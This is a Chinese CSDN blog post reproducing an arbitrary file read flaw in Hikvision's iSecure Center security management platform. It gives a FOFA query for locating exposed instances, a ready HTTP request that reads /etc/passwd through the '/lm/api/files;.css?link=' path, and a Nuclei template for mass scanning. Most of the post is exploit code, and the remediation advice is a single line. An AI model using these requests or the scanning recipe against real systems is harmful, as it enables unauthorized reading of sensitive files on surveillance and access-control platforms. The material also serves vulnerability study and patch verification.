海康威视综合安防管理平台 files 文件读取漏洞

最新推荐文章于 2024-06-19 18:34:52 发布
最新推荐文章于 2024-06-19 18:34:52 发布
阅读量1.9k 收藏 34
点赞数 48
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71285176/article/details/135505311
版权

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

一、漏洞名称

海康威视综合安防管理平台 files 文件读取漏洞

二、漏洞影响

综合安防管理平台

三、漏洞描述

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。在其某接口处存在任意文件读取漏洞,攻击者可以读取系统任意敏感文件。

四、FOFA搜索语句

FOFA语句:"综合安防管理平台"

五、漏洞复现

GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1
Host: xxx.xxx.xxxx
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9

复现成功

六、POC

漏洞POC

GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1
Host: xxx.xxxx.xxxx
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9

NucleiPOC

id: hikvision-files-fileread

info:
name: 海康威视-综合安防管理平台-files-文件读取
author: hikvision-files-fileread
severity: high

requests:
- raw:
  - |
    GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1
    Host: {{Hostname}}
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

matchers:
  - type: dsl
    dsl:
      - contains_all(all_headers,'attachment','fileName')

七、修复建议

联系厂家,升级到最新的版本 打补丁

hacker?
关注
海康威视iVMS-8700综合安防管理平台 文件读取漏洞复现
0xSec
12-13 2235
HIKVISION iVMS 综合安防管理平台download接口处存在任意文件读取漏洞,攻击者通过构造token绕过身份认证,读取服务器中的目录信息与敏感文件。使系统处于极不安全的状态。
海康威视综合安防管理平台 detection 前台RCE漏洞复现
最新发布
0xSec
07-22 4916
海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
fly夏天的博客
06-19 1943
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞 附POC软件
nnn2188185的博客
01-23 844
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。
海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞复现
0xSec
05-31 1282
海康威视综合安防管理平台 orgManage/v1/orgs/download 接口处存在任意文件读取漏洞,未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件,造成信息泄露,使系统处于极不安全的状态。
海康威视iSecure-Center 综合安防管理平台 download 任意文件读取漏洞
WuYSec的博客
06-12 628
海康威视iSecure-Center综合安防管理平台是一款“集成化”、“智能化”的平台,能够接入视频监控、一卡通、停车场、报警检测等系统设备。通过海康威视的集成化综合管理软件平台,可以对接入的视频监控点进行集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视iSecure-Center综合安防管理平台/orgManage/v1/orgs/download接口存在任意文件读取漏洞,可通过此漏洞读取任意文件
海康威视视频编码设备接入网关存在任意文件读取漏洞
nnn2188185的博客
04-27 804
海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。 杭州海康威视系统技术有限公司流媒体管理服务器存在任意文件读取漏洞
Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞
weixin_43567873的博客
03-09 264
Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞
海康威视-综合安防管理平台-files-文件读取
weixin_43567873的博客
03-13 168
海康威视-综合安防管理平台-files-文件读取
漏洞复现】Hikvision综合安防管理平台任意文件读取漏洞
晚风不及你
01-22 2116
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
【1day】复现海康威视综合安防管理平台center 接口文件上传漏洞
记录并分享学习安全的知识点..
10-17 522
​ HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。海康威视综合安防管理平台center 接口存在文件上传漏洞,,攻击者通过上传恶意文件,从而在Web服务器上执行未经授权的操作。 ​
02_【复现】海康威视综合安防管理平台任意文件读取
fushuang333的博客
12-29 1084
海康威视综合安防管理平台任意文件读取海康威视综合安防管理平台是一款基于云计算、大数据、人工智能技术构建的智能化综合安防平台
海康威视安全接入网关 任意文件读取漏洞复现
0xSec
01-05 1639
海康威视安全接入网关使用Jquery-1.7.2 , 该版本存在任意文件读取漏洞,可获取服务器内部敏感信息泄露(安博通应用网关也存在此漏洞
海康威视isecure center 综合安防管理平台任意文件上传漏洞
holyxp的博客
07-02 4296
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。
Goby 漏洞更新 |海康威视部分iVMS系统存在文件上传漏洞
m0_46699477的博客
06-02 1813
海康威视-iVMS综合安防管理平台是一套“集成化”、“数字化”、“智能化”的平台,包含视频、报警、门禁、访客、梯控、巡查、考勤、消费、停车场、可视对讲等多个子系统。攻击者通过获取密钥任意构造token,请求某个接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
漏洞复现】Hikvision综合安防管理平台files文件上传漏洞
晚风不及你
01-22 929
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视isecure center 综合安防管理平台存在任意文件上传漏洞
nnn2188185的博客
06-29 1565
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视
海康威视(iVMS)综合安防系统任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
11-13 1524
海康威视iVMS系统存在任意文件上传漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
热门推荐
做自己喜欢的事,并将其发挥到极致!
06-02 1万+
海康威视 iVMS 集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、连网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台海康威视 iVMS系统存在在野利用 0day漏洞,攻击者可通过获取密钥任意构造token,请求/resourceOperations/upload 接口任意上传文件,导致获取服务器WebShell权限,同时可远程进行恶意代码执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值